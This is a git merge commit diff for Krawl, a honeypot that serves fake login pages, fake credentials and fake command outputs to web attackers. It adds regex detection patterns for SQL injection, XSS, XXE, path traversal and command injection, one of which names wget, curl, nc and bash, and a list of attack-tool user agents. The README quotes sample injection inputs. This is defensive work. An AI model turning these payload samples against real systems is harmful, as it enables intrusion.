Merge pull request #78 from BlessedRebuS/feat/raw-requests-attack-enanchements

added raw request handling, enanched attack detection for GET and POS…
This commit is contained in:
Patrick Di Fazio
2026-02-08 17:02:08 +01:00
committed by GitHub
26 changed files with 2312 additions and 867 deletions

View File

@@ -1,6 +0,0 @@
splitw -v -p 10
neww -n worker
select-window -t 1
select-pane -t 0
send-keys -t 0 "nvim" C-m
send-keys -t 1 "docker compose watch" C-m

View File

@@ -264,35 +264,51 @@ Below is a complete overview of the Krawl honeypots capabilities
The actual (juicy) robots.txt configuration [is the following](src/templates/html/robots.txt).
## Honeypot pages
### Common Login Attempts
Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing).
![admin page](img/admin-page.png)
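A minimal sketch of this delayed fake-login flow; the function, field names, and response shape are illustrative assumptions, not Krawl's actual code:

```python
import time
from datetime import datetime, timezone

# Hypothetical handler for the fake admin login pages described above.
ADMIN_PATHS = {"/admin/", "/wp-admin/", "/phpMyAdmin/"}

def handle_login_attempt(path, form, headers, ip, delay_seconds=1.0):
    """Return a fake 'invalid credentials' response plus a full log record."""
    if path not in ADMIN_PATHS:
        return None  # not a honeypot login page
    start = time.monotonic()
    time.sleep(delay_seconds)  # simulate real credential checking
    record = {
        "ip": ip,
        "path": path,
        "username": form.get("username", ""),
        "password": form.get("password", ""),
        "headers": dict(headers),
        "elapsed_ms": round((time.monotonic() - start) * 1000),
        "timestamp": datetime.now(timezone.utc).isoformat(),
    }
    return {"status": 401, "body": "Invalid credentials", "log": record}
```

The delay makes automated credential stuffing pay a time cost per attempt while every submitted credential pair lands in the log.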
### Common Misconfiguration Paths
Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with “interesting” files, each assigned a random file size to look realistic.
![directory-page](img/directory-page.png)
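The listing logic can be sketched roughly as follows, reusing the size bounds from the `fake_files` entries added later in this PR (the helper name and output layout are assumptions):

```python
import random

# Entry bounds mirror the fake_files config in this PR.
FAKE_FILES = [
    {"name": "settings.conf", "size_min": 1024, "size_max": 8192, "perms": "-rw-r--r--"},
    {"name": "database.sql", "size_min": 10240, "size_max": 102400, "perms": "-rw-r--r--"},
    {"name": ".htaccess", "size_min": 256, "size_max": 1024, "perms": "-rw-r--r--"},
]

def render_listing(path, files=FAKE_FILES):
    """Build a fake 'Index of' page with a freshly randomized size per file."""
    rows = [
        f"{f['perms']} {random.randint(f['size_min'], f['size_max']):>8} {f['name']}"
        for f in files
    ]
    return f"Index of {path}\n" + "\n".join(rows)
```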
### Environment File Leakage
The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a “juicy” misconfiguration that crawlers and scanners often flag as information leakage.
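A hedged sketch of what such an endpoint might return; the placeholder secrets and response shape are assumptions, not Krawl's template:

```python
# Fake secrets; every value below is a deliberately bogus placeholder.
FAKE_ENV = "\n".join([
    "DATABASE_URL=mysql://webapp:fake_password@localhost:3306/app",
    "AWS_ACCESS_KEY_ID=AKIAFAKEFAKEFAKEFAKE",
    "AWS_SECRET_ACCESS_KEY=fake/secret/key",
    "STRIPE_SECRET_KEY=sk_live_fakefakefakefake",
])

def serve_env():
    # application/json instead of text/plain is the deliberate "mistake"
    # that scanners flag as an information-leak misconfiguration.
    return {
        "status": 200,
        "headers": {"Content-Type": "application/json"},
        "body": FAKE_ENV,
    }
```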
### Server Error Information
The `/server` page displays randomly generated fake error information for each known server.
![server and env page](img/server-and-env-page.png)
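The randomized error pages could work along these lines; the version list and template fragment mirror the `server_errors.nginx` block added later in this PR, but the helper itself is illustrative:

```python
import random

# Versions taken from the server_errors config in this PR.
NGINX_VERSIONS = ["1.18.0", "1.20.1", "1.22.0", "1.24.0"]
NGINX_TEMPLATE = (
    "<!DOCTYPE html>\n<html>\n"
    "<head><title>{code} {message}</title></head>\n"
    "<body>\n<h1>An error occurred.</h1>\n"
    "<p><em>Faithfully yours, nginx/{version}.</em></p>\n"
    "</body>\n</html>"
)

def fake_nginx_error(code=502, message="Bad Gateway"):
    """Render the error page with a freshly randomized server version."""
    return NGINX_TEMPLATE.format(
        code=code, message=message, version=random.choice(NGINX_VERSIONS)
    )
```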
### API Endpoints with Sensitive Data
The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format.
![users and secrets](img/users-and-secrets.png)
### Exposed Credential Files
The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets.
![credentials and passwords](img/credentials-and-passwords.png)
### SQL Injection and XSS Detection
Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**.
![sql injection](img/sql_injection.png)
Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard.
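A minimal sketch of per-request randomized database errors; the engine names and messages are drawn from the `sql_errors` config shown later in this PR, while the helper itself is an assumption:

```python
import random

# A small subset of the sql_errors config from this PR.
SQL_ERRORS = {
    "mysql": [
        "You have an error in your SQL syntax",
        "Table '{table}' doesn't exist",
    ],
    "postgresql": [
        "ERROR: syntax error at or near",
        'ERROR: relation "{table}" does not exist',
    ],
    "sqlite": ["no such table: {table}"],
}

def random_sql_error(table="users"):
    """Pick a random engine and message so repeated scans never see the same error."""
    engine = random.choice(list(SQL_ERRORS))
    message = random.choice(SQL_ERRORS[engine]).format(table=table)
    return engine, message
```

Because the engine and message change on every request, fingerprinting tools that infer the backend from error text get contradictory signals.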
### Path Traversal Detection
Krawl detects and responds to **path traversal** attempts targeting common system files like `/etc/passwd`, `/etc/shadow`, or Windows system paths. When an attacker tries to access sensitive files using patterns like `../../../etc/passwd` or encoded variants (`%2e%2e/`, `%252e`), Krawl returns convincing fake file contents with realistic system users, UIDs, GIDs, and shell configurations. This wastes attacker time while logging the full attack pattern.
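Detection across encoded variants can be sketched as below; the simplified regex follows the style of the `attack_patterns` config in this PR but is not Krawl's exact pattern:

```python
import re
import urllib.parse

# Simplified traversal markers (assumption, modeled on attack_patterns.path_traversal).
TRAVERSAL = re.compile(
    r"(\.\./|\.\.\\|%2e%2e|%252e|/etc/passwd|/etc/shadow)", re.IGNORECASE
)

def is_path_traversal(path):
    """Check the raw, decoded, and double-decoded path for traversal markers."""
    decoded = urllib.parse.unquote(path)
    decoded_twice = urllib.parse.unquote(decoded)  # catches double encoding
    return any(TRAVERSAL.search(p) for p in (path, decoded, decoded_twice))
```

Decoding twice is what catches `%252e`-style payloads, where one decode pass only yields `%2e`.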
### XXE (XML External Entity) Injection
The `/api/xml` and `/api/parser` endpoints accept XML input and are designed to detect **XXE injection** attempts. When attackers try to exploit external entity declarations (`<!ENTITY`, `<!DOCTYPE`, `SYSTEM`) or reference entities to access local files, Krawl responds with realistic XML responses that appear to process the entities successfully. The honeypot returns fake file contents, simulated entity values (like `admin_credentials` or `database_connection`), or realistic error messages, making the attack appear successful while fully logging the payload.
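A hedged sketch of that response path; the markers, entity values, and template mirror the `xxe_responses` config added in this PR, while the dispatch logic is an assumption:

```python
import random
import re

# Entity-declaration markers and fake values, per the xxe_responses config.
XXE_MARKERS = re.compile(r"(<!ENTITY|<!DOCTYPE|SYSTEM\s+[\"'])", re.IGNORECASE)
ENTITY_VALUES = ["admin_credentials", "database_connection", "api_secret_key"]

RESPONSE = """<?xml version="1.0"?>
<response>
  <status>success</status>
  <message>Entity processed successfully</message>
  <entity_value>{entity_value}</entity_value>
</response>"""

def handle_xml(body):
    """Answer XXE probes with a fake 'entity processed' success response."""
    if XXE_MARKERS.search(body):
        return RESPONSE.format(entity_value=random.choice(ENTITY_VALUES))
    return '<?xml version="1.0"?><response><status>ok</status></response>'
```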
### Command Injection Detection
Pages like `/api/exec`, `/api/run`, and `/api/system` simulate command execution endpoints vulnerable to **command injection**. When attackers attempt to inject shell commands using patterns like `; whoami`, `| cat /etc/passwd`, or backticks, Krawl responds with realistic command outputs. For example, `whoami` returns fake usernames like `www-data` or `nginx`, while `uname` returns fake Linux kernel versions. Network commands like `wget` or `curl` simulate downloads or return "command not found" errors, creating believable responses that delay and confuse automated exploitation tools.
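The command-to-output mapping can be sketched like this; the fake outputs follow the `command_outputs` config in this PR, while the separator-matching dispatch is an assumption:

```python
import random
import re

# Fake outputs per command, modeled on the command_outputs config.
FAKE_OUTPUTS = {
    "whoami": ["www-data", "nginx", "apache"],
    "pwd": ["/var/www/html", "/usr/share/nginx/html"],
    "uname": ["Linux webserver 5.4.0-42-generic x86_64 GNU/Linux"],
    "wget": ["bash: wget: command not found"],
}

def fake_command_output(payload):
    """Return a believable output for a known command found at the start
    of the payload or after a shell separator (; | & or backtick)."""
    for cmd, outputs in FAKE_OUTPUTS.items():
        if re.search(rf"(^|[;|&`]\s*){cmd}\b", payload):
            return random.choice(outputs)
    return None  # no injection detected
```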
## Customizing the Canary Token
To create a custom canary token, visit https://canarytokens.org

View File

@@ -1,7 +1,7 @@
# Krawl Honeypot Configuration
server:
-  port: 5000
+  port: 1234
  delay: 100 # Response delay in milliseconds
  # manually set the server header, if null a random one will be used.

View File

@@ -2,8 +2,8 @@ apiVersion: v2
name: krawl-chart
description: A Helm chart for Krawl honeypot server
type: application
-version: 1.0.3
+version: 1.0.4
-appVersion: 1.0.3
+appVersion: 1.0.4
keywords:
- honeypot
- security

View File

@@ -312,6 +312,307 @@ wordlists:
- .git/
- keys/
- credentials/
fake_files:
- name: settings.conf
size_min: 1024
size_max: 8192
perms: "-rw-r--r--"
- name: database.sql
size_min: 10240
size_max: 102400
perms: "-rw-r--r--"
- name: .htaccess
size_min: 256
size_max: 1024
perms: "-rw-r--r--"
- name: README.md
size_min: 512
size_max: 2048
perms: "-rw-r--r--"
fake_directories:
- name: config
size: "4096"
perms: drwxr-xr-x
- name: backup
size: "4096"
perms: drwxr-xr-x
- name: logs
size: "4096"
perms: drwxrwxr-x
- name: data
size: "4096"
perms: drwxr-xr-x
fake_passwd:
system_users:
- "root:x:0:0:root:/root:/bin/bash"
- "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
- "bin:x:2:2:bin:/bin:/usr/sbin/nologin"
- "sys:x:3:3:sys:/dev:/usr/sbin/nologin"
- "sync:x:4:65534:sync:/bin:/bin/sync"
- "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
- "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin"
- "mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false"
- "sshd:x:109:65534::/run/sshd:/usr/sbin/nologin"
uid_min: 1000
uid_max: 2000
gid_min: 1000
gid_max: 2000
shells:
- /bin/bash
- /bin/sh
- /usr/bin/zsh
fake_shadow:
system_entries:
- "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::"
- "daemon:*:19000:0:99999:7:::"
- "bin:*:19000:0:99999:7:::"
- "sys:*:19000:0:99999:7:::"
- "www-data:*:19000:0:99999:7:::"
hash_prefix: "$6$rounds=656000$"
salt_length: 16
hash_length: 86
xxe_responses:
file_access:
template: |
<?xml version="1.0"?>
<response>
<status>success</status>
<data>{content}</data>
</response>
entity_processed:
template: |
<?xml version="1.0"?>
<response>
<status>success</status>
<message>Entity processed successfully</message>
<entity_value>{entity_value}</entity_value>
</response>
entity_values:
- "admin_credentials"
- "database_connection"
- "api_secret_key"
- "internal_server_ip"
- "encrypted_password"
error:
template: |
<?xml version="1.0"?>
<response>
<status>error</status>
<message>{message}</message>
</response>
messages:
- "External entity not allowed"
- "XML parsing error"
- "Invalid entity reference"
default_content: "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
command_outputs:
id:
- "uid={uid}(www-data) gid={gid}(www-data) groups={gid}(www-data)"
- "uid={uid}(nginx) gid={gid}(nginx) groups={gid}(nginx)"
- "uid={uid}(apache) gid={gid}(apache) groups={gid}(apache)"
whoami:
- www-data
- nginx
- apache
- webapp
- nobody
uname:
- "Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux"
- "Linux app-server 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 GNU/Linux"
- "Linux prod-server 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux"
pwd:
- /var/www/html
- /home/webapp/public_html
- /usr/share/nginx/html
- /opt/app/public
ls:
- ["index.php", "config.php", "uploads", "assets", "README.md", ".htaccess", "admin"]
- ["app.js", "package.json", "node_modules", "public", "views", "routes"]
- ["index.html", "css", "js", "images", "data", "api"]
cat_config: |
<?php
// Configuration file
$db_host = 'localhost';
$db_user = 'webapp';
$db_pass = 'fake_password';
?>
network_commands:
- "bash: wget: command not found"
- "curl: (6) Could not resolve host: example.com"
- "Connection timeout"
- "bash: nc: command not found"
- "Downloaded {size} bytes"
generic:
- "sh: 1: syntax error: unexpected end of file"
- "Command executed successfully"
- ""
- "/bin/sh: {num}: not found"
- "bash: command not found"
uid_min: 1000
uid_max: 2000
gid_min: 1000
gid_max: 2000
download_size_min: 100
download_size_max: 10000
sql_errors:
mysql:
syntax_errors:
- "You have an error in your SQL syntax"
- "check the manual that corresponds to your MySQL server version"
table_errors:
- "Table '{table}' doesn't exist"
- "Unknown table '{table}'"
column_errors:
- "Unknown column '{column}' in 'field list'"
- "Unknown column '{column}' in 'where clause'"
postgresql:
syntax_errors:
- "ERROR: syntax error at or near"
- "ERROR: unterminated quoted string"
relation_errors:
- "ERROR: relation \"{table}\" does not exist"
column_errors:
- "ERROR: column \"{column}\" does not exist"
mssql:
syntax_errors:
- "Incorrect syntax near"
- "Unclosed quotation mark"
object_errors:
- "Invalid object name '{table}'"
column_errors:
- "Invalid column name '{column}'"
oracle:
syntax_errors:
- "ORA-00933: SQL command not properly ended"
- "ORA-00904: invalid identifier"
table_errors:
- "ORA-00942: table or view does not exist"
sqlite:
syntax_errors:
- "near \"{token}\": syntax error"
table_errors:
- "no such table: {table}"
column_errors:
- "no such column: {column}"
mongodb:
query_errors:
- "Failed to parse"
- "unknown operator"
collection_errors:
- "ns not found"
server_errors:
nginx:
versions:
- "1.18.0"
- "1.20.1"
- "1.22.0"
- "1.24.0"
template: |
<!DOCTYPE html>
<html>
<head>
<title>{code} {message}</title>
<style>
body {{
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}}
</style>
</head>
<body>
<h1>An error occurred.</h1>
<p>Sorry, the page you are looking for is currently unavailable.<br/>
Please try again later.</p>
<p>If you are the system administrator of this resource then you should check the error log for details.</p>
<p><em>Faithfully yours, nginx/{version}.</em></p>
</body>
</html>
apache:
versions:
- "2.4.41"
- "2.4.52"
- "2.4.54"
- "2.4.57"
os:
- Ubuntu
- Debian
- CentOS
template: |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>{code} {message}</title>
</head><body>
<h1>{message}</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/{version} ({os}) Server at {host} Port 80</address>
</body></html>
iis:
versions:
- "10.0"
- "8.5"
- "8.0"
template: |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>{code} - {message}</title>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<h2>{code} - {message}</h2>
<h3>The page cannot be displayed because an internal server error has occurred.</h3>
</div>
</body>
</html>
attack_patterns:
path_traversal: "(\\.\\.| %2e%2e|%252e|/etc/passwd|/etc/shadow|\\.\\.\\\\/|\\.\\./|/windows/system32|c:\\\\windows|/proc/self|\\.\\.\\.%2f|\\.\\.\\.%5c|etc/passwd|etc/shadow)"
sql_injection: "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)"
xss_attempt: "(<script|</script|javascript:|onerror=|onload=|onclick=|onmouseover=|onfocus=|onblur=|<iframe|<img|<svg|<embed|<object|<body|<input|eval\\(|alert\\(|prompt\\(|confirm\\(|document\\.|window\\.|<style|expression\\(|vbscript:|data:text/html)"
lfi_rfi: "(file://|php://|expect://|data://|zip://|phar://|/etc/passwd|/etc/shadow|/proc/self|c:\\\\windows)"
xxe_injection: "(<!ENTITY|<!DOCTYPE|SYSTEM\\s+[\"']|PUBLIC\\s+[\"']|&\\w+;|file://|php://filter|expect://)"
ldap_injection: "(\\*\\)|\\(\\||\\(&)"
command_injection: "(cmd=|exec=|command=|execute=|system=|ping=|host=|&&|\\|\\||;|\\$\\{|\\$\\(|`|\\bid\\b|\\bwhoami\\b|\\buname\\b|\\bcat\\b|\\bls\\b|\\bpwd\\b|\\becho\\b|\\bwget\\b|\\bcurl\\b|\\bnc\\b|\\bnetcat\\b|\\bbash\\b|\\bsh\\b|\\bps\\b|\\bkill\\b|\\bchmod\\b|\\bchown\\b|\\bcp\\b|\\bmv\\b|\\brm\\b|/bin/bash|/bin/sh|cmd\\.exe|/bin/|/usr/bin/|/sbin/)"
suspicious_patterns:
- bot
- crawler
- spider
- scraper
- curl
- wget
- python-requests
- scanner
- nikto
- sqlmap
- nmap
- masscan
- nessus
- acunetix
- burp
- zap
- w3af
- metasploit
- nuclei
- gobuster
- dirbuster
credential_fields:
username_fields:
- username
- user
- login
- email
- log
- userid
- account
password_fields:
- password
- pass
- passwd
- pwd
- passphrase
server_headers:
- Apache/2.2.22 (Ubuntu)
- nginx/1.18.0

View File

@@ -1,342 +0,0 @@
#!/usr/bin/env python3
from sqlalchemy import select
from typing import Optional
from database import get_database, DatabaseManager
from zoneinfo import ZoneInfo
from pathlib import Path
from datetime import datetime, timedelta
import re
import urllib.parse
from wordlists import get_wordlists
from config import get_config
from logger import get_app_logger
import requests
"""
Functions for user activity analysis
"""
app_logger = get_app_logger()
class Analyzer:
"""
Analyzes users activity and produces aggregated insights
"""
def __init__(self, db_manager: Optional[DatabaseManager] = None):
"""
Initialize the analyzer.
Args:
db_manager: Optional DatabaseManager for persistence.
If None, will use the global singleton.
"""
self._db_manager = db_manager
@property
def db(self) -> Optional[DatabaseManager]:
"""
Get the database manager, lazily initializing if needed.
Returns:
DatabaseManager instance or None if not available
"""
if self._db_manager is None:
try:
self._db_manager = get_database()
except Exception:
pass
return self._db_manager
# def infer_user_category(self, ip: str) -> str:
# config = get_config()
# http_risky_methods_threshold = config.http_risky_methods_threshold
# violated_robots_threshold = config.violated_robots_threshold
# uneven_request_timing_threshold = config.uneven_request_timing_threshold
# user_agents_used_threshold = config.user_agents_used_threshold
# attack_urls_threshold = config.attack_urls_threshold
# uneven_request_timing_time_window_seconds = config.uneven_request_timing_time_window_seconds
# app_logger.debug(f"http_risky_methods_threshold: {http_risky_methods_threshold}")
# score = {}
# score["attacker"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# score["good_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# score["bad_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# score["regular_user"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False}
# #1-3 low, 4-6 mid, 7-9 high, 10-20 extreme
# weights = {
# "attacker": {
# "risky_http_methods": 6,
# "robots_violations": 4,
# "uneven_request_timing": 3,
# "different_user_agents": 8,
# "attack_url": 15
# },
# "good_crawler": {
# "risky_http_methods": 1,
# "robots_violations": 0,
# "uneven_request_timing": 0,
# "different_user_agents": 0,
# "attack_url": 0
# },
# "bad_crawler": {
# "risky_http_methods": 2,
# "robots_violations": 7,
# "uneven_request_timing": 0,
# "different_user_agents": 5,
# "attack_url": 5
# },
# "regular_user": {
# "risky_http_methods": 0,
# "robots_violations": 0,
# "uneven_request_timing": 8,
# "different_user_agents": 3,
# "attack_url": 0
# }
# }
# accesses = self.db.get_access_logs(ip_filter = ip, limit=1000)
# total_accesses_count = len(accesses)
# if total_accesses_count <= 0:
# return
# # Set category as "unknown" for the first 5 requests
# if total_accesses_count < 3:
# category = "unknown"
# analyzed_metrics = {}
# category_scores = {"attacker": 0, "good_crawler": 0, "bad_crawler": 0, "regular_user": 0, "unknown": 0}
# last_analysis = datetime.now(tz=ZoneInfo('UTC'))
# self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis)
# return 0
# #--------------------- HTTP Methods ---------------------
# get_accesses_count = len([item for item in accesses if item["method"] == "GET"])
# post_accesses_count = len([item for item in accesses if item["method"] == "POST"])
# put_accesses_count = len([item for item in accesses if item["method"] == "PUT"])
# delete_accesses_count = len([item for item in accesses if item["method"] == "DELETE"])
# head_accesses_count = len([item for item in accesses if item["method"] == "HEAD"])
# options_accesses_count = len([item for item in accesses if item["method"] == "OPTIONS"])
# patch_accesses_count = len([item for item in accesses if item["method"] == "PATCH"])
# if total_accesses_count > http_risky_methods_threshold:
# http_method_attacker_score = (post_accesses_count + put_accesses_count + delete_accesses_count + options_accesses_count + patch_accesses_count) / total_accesses_count
# else:
# http_method_attacker_score = 0
# #print(f"HTTP Method attacker score: {http_method_attacker_score}")
# if http_method_attacker_score >= http_risky_methods_threshold:
# score["attacker"]["risky_http_methods"] = True
# score["good_crawler"]["risky_http_methods"] = False
# score["bad_crawler"]["risky_http_methods"] = True
# score["regular_user"]["risky_http_methods"] = False
# else:
# score["attacker"]["risky_http_methods"] = False
# score["good_crawler"]["risky_http_methods"] = True
# score["bad_crawler"]["risky_http_methods"] = False
# score["regular_user"]["risky_http_methods"] = False
# #--------------------- Robots Violations ---------------------
# #respect robots.txt and login/config pages access frequency
# robots_disallows = []
# robots_path = Path(__file__).parent / "templates" / "html" / "robots.txt"
# with open(robots_path, "r") as f:
# for line in f:
# line = line.strip()
# if not line:
# continue
# parts = line.split(":")
# if parts[0] == "Disallow":
# parts[1] = parts[1].rstrip("/")
# #print(f"DISALLOW {parts[1]}")
# robots_disallows.append(parts[1].strip())
# #if 0 100% sure is good crawler, if >10% of robots violated is bad crawler or attacker
# violated_robots_count = len([item for item in accesses if any(item["path"].rstrip("/").startswith(disallow) for disallow in robots_disallows)])
# #print(f"Violated robots count: {violated_robots_count}")
# if total_accesses_count > 0:
# violated_robots_ratio = violated_robots_count / total_accesses_count
# else:
# violated_robots_ratio = 0
# if violated_robots_ratio >= violated_robots_threshold:
# score["attacker"]["robots_violations"] = True
# score["good_crawler"]["robots_violations"] = False
# score["bad_crawler"]["robots_violations"] = True
# score["regular_user"]["robots_violations"] = False
# else:
# score["attacker"]["robots_violations"] = False
# score["good_crawler"]["robots_violations"] = False
# score["bad_crawler"]["robots_violations"] = False
# score["regular_user"]["robots_violations"] = False
# #--------------------- Requests Timing ---------------------
# #Request rate and timing: steady, throttled, polite vs attackers' bursty, aggressive, or oddly rhythmic behavior
# timestamps = [datetime.fromisoformat(item["timestamp"]) for item in accesses]
# now_utc = datetime.now(tz=ZoneInfo('UTC'))
# timestamps = [ts for ts in timestamps if now_utc - ts <= timedelta(seconds=uneven_request_timing_time_window_seconds)]
# timestamps = sorted(timestamps, reverse=True)
# time_diffs = []
# for i in range(0, len(timestamps)-1):
# diff = (timestamps[i] - timestamps[i+1]).total_seconds()
# time_diffs.append(diff)
# mean = 0
# variance = 0
# std = 0
# cv = 0
# if time_diffs:
# mean = sum(time_diffs) / len(time_diffs)
# variance = sum((x - mean) ** 2 for x in time_diffs) / len(time_diffs)
# std = variance ** 0.5
# cv = std/mean
# app_logger.debug(f"Mean: {mean} - Variance {variance} - Standard Deviation {std} - Coefficient of Variation: {cv}")
# if cv >= uneven_request_timing_threshold:
# score["attacker"]["uneven_request_timing"] = True
# score["good_crawler"]["uneven_request_timing"] = False
# score["bad_crawler"]["uneven_request_timing"] = False
# score["regular_user"]["uneven_request_timing"] = True
# else:
# score["attacker"]["uneven_request_timing"] = False
# score["good_crawler"]["uneven_request_timing"] = False
# score["bad_crawler"]["uneven_request_timing"] = False
# score["regular_user"]["uneven_request_timing"] = False
# #--------------------- Different User Agents ---------------------
# #Header Quality and Consistency: Crawlers tend to use complete and consistent headers, attackers might miss, fake, or change headers
# user_agents_used = [item["user_agent"] for item in accesses]
# user_agents_used = list(dict.fromkeys(user_agents_used))
# #print(f"User agents used: {user_agents_used}")
# if len(user_agents_used) >= user_agents_used_threshold:
# score["attacker"]["different_user_agents"] = True
# score["good_crawler"]["different_user_agents"] = False
# score["bad_crawler"]["different_user_agentss"] = True
# score["regular_user"]["different_user_agents"] = False
# else:
# score["attacker"]["different_user_agents"] = False
# score["good_crawler"]["different_user_agents"] = False
# score["bad_crawler"]["different_user_agents"] = False
# score["regular_user"]["different_user_agents"] = False
# #--------------------- Attack URLs ---------------------
# attack_urls_found_list = []
# wl = get_wordlists()
# if wl.attack_patterns:
# queried_paths = [item["path"] for item in accesses]
# for queried_path in queried_paths:
# # URL decode the path to catch encoded attacks
# try:
# decoded_path = urllib.parse.unquote(queried_path)
# # Double decode to catch double-encoded attacks
# decoded_path_twice = urllib.parse.unquote(decoded_path)
# except Exception:
# decoded_path = queried_path
# decoded_path_twice = queried_path
# for name, pattern in wl.attack_patterns.items():
# # Check original, decoded, and double-decoded paths
# if (re.search(pattern, queried_path, re.IGNORECASE) or
# re.search(pattern, decoded_path, re.IGNORECASE) or
# re.search(pattern, decoded_path_twice, re.IGNORECASE)):
# attack_urls_found_list.append(f"{name}: {pattern}")
# #remove duplicates
# attack_urls_found_list = set(attack_urls_found_list)
# attack_urls_found_list = list(attack_urls_found_list)
# if len(attack_urls_found_list) > attack_urls_threshold:
# score["attacker"]["attack_url"] = True
# score["good_crawler"]["attack_url"] = False
# score["bad_crawler"]["attack_url"] = False
# score["regular_user"]["attack_url"] = False
# else:
# score["attacker"]["attack_url"] = False
# score["good_crawler"]["attack_url"] = False
# score["bad_crawler"]["attack_url"] = False
# score["regular_user"]["attack_url"] = False
# #--------------------- Calculate score ---------------------
# attacker_score = good_crawler_score = bad_crawler_score = regular_user_score = 0
# attacker_score = score["attacker"]["risky_http_methods"] * weights["attacker"]["risky_http_methods"]
# attacker_score = attacker_score + score["attacker"]["robots_violations"] * weights["attacker"]["robots_violations"]
# attacker_score = attacker_score + score["attacker"]["uneven_request_timing"] * weights["attacker"]["uneven_request_timing"]
# attacker_score = attacker_score + score["attacker"]["different_user_agents"] * weights["attacker"]["different_user_agents"]
# attacker_score = attacker_score + score["attacker"]["attack_url"] * weights["attacker"]["attack_url"]
# good_crawler_score = score["good_crawler"]["risky_http_methods"] * weights["good_crawler"]["risky_http_methods"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["robots_violations"] * weights["good_crawler"]["robots_violations"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["uneven_request_timing"] * weights["good_crawler"]["uneven_request_timing"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["different_user_agents"] * weights["good_crawler"]["different_user_agents"]
# good_crawler_score = good_crawler_score + score["good_crawler"]["attack_url"] * weights["good_crawler"]["attack_url"]
# bad_crawler_score = score["bad_crawler"]["risky_http_methods"] * weights["bad_crawler"]["risky_http_methods"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["robots_violations"] * weights["bad_crawler"]["robots_violations"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["uneven_request_timing"] * weights["bad_crawler"]["uneven_request_timing"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["different_user_agents"] * weights["bad_crawler"]["different_user_agents"]
# bad_crawler_score = bad_crawler_score + score["bad_crawler"]["attack_url"] * weights["bad_crawler"]["attack_url"]
# regular_user_score = score["regular_user"]["risky_http_methods"] * weights["regular_user"]["risky_http_methods"]
# regular_user_score = regular_user_score + score["regular_user"]["robots_violations"] * weights["regular_user"]["robots_violations"]
# regular_user_score = regular_user_score + score["regular_user"]["uneven_request_timing"] * weights["regular_user"]["uneven_request_timing"]
# regular_user_score = regular_user_score + score["regular_user"]["different_user_agents"] * weights["regular_user"]["different_user_agents"]
# regular_user_score = regular_user_score + score["regular_user"]["attack_url"] * weights["regular_user"]["attack_url"]
# score_details = f"""
# Attacker score: {attacker_score}
# Good Crawler score: {good_crawler_score}
# Bad Crawler score: {bad_crawler_score}
# Regular User score: {regular_user_score}
# """
# app_logger.debug(score_details)
# analyzed_metrics = {"risky_http_methods": http_method_attacker_score, "robots_violations": violated_robots_ratio, "uneven_request_timing": mean, "different_user_agents": user_agents_used, "attack_url": attack_urls_found_list}
# category_scores = {"attacker": attacker_score, "good_crawler": good_crawler_score, "bad_crawler": bad_crawler_score, "regular_user": regular_user_score}
# category = max(category_scores, key=category_scores.get)
# last_analysis = datetime.now(tz=ZoneInfo('UTC'))
# self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis)
# return 0
# def update_ip_rep_infos(self, ip: str) -> list[str]:
# api_url = "https://iprep.lcrawl.com/api/iprep/"
# params = {
# "cidr": ip
# }
# headers = {
# "Content-Type": "application/json"
# }
